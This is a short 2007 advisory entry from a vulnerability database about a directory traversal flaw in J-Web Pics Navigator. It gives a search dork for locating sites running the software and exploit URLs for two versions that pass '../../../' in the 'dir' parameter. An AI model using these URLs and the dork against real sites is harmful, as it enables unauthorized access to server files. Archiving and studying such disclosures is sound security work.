Pics Navigator Directory Traversal Vulnerability

2007-02-22T00:00:00
ID SECURITYVULNS:DOC:16146
Type securityvulns
Reporter Securityvulns
Modified 2007-02-22T00:00:00

Description

  • Pics Navigator Directory Traversal Vulnerability

  • By : sn0oPy

  • Risk : medium

  • site : http://www.jeunes-webmasters.com/

  • Dork : "Powered by J-Web Pics Navigator v2.0" | inurl:"jwpn-photos.php" |

  • exploit :

     for the v1.0 http://www.target/[gallery directory]/pn-menu.php?ret=Pics%20Navigator&dir=../../../
     for the v2.0 http://www.target.ma/jwpn-photos.php?dir=../../../
    
  • contact : sn0oPy@avenir-geopolitique.net

  • greetz : [subzero], Avg Team(forums.avenir-geopolitique.net).

Reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2692